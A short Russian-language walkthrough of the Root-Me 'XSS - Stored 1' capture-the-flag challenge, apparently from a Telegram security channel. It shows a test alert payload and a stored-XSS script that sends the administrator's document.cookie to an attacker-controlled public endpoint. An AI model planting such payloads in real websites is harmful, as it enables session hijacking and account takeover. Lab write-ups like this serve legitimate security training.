www.root-me.org
March 13
XSS - Stored 1 www.root-me.org
Сложность: 3-й уровень испытания
Заявление
Украдите файл cookie сеанса администратора и используйте его для проверки этого запроса.
На главной странице сайта расположена форма заполнения Title и Message
Попробуем проверить на xss уязвимость
<script>alert('XSS');</script>
alert('XSS')Ссылка - воспользуемся сайтом, чтобы создать общедоступную конечную точку
Напишем скрипт, который позволит перехватит Cookie администратора.
<script>document.location='общедоступная конечная точка/steal?cookie='+document.cookie;</script>
Вставим скрипт и отправим, остаётся подождать.
Уязвимость достаточно серьёзная учитывая, что ошибка происходит на стороне сервера.
Автор: https://t.me/cybersecuritybureau | Здесь еще больше разборов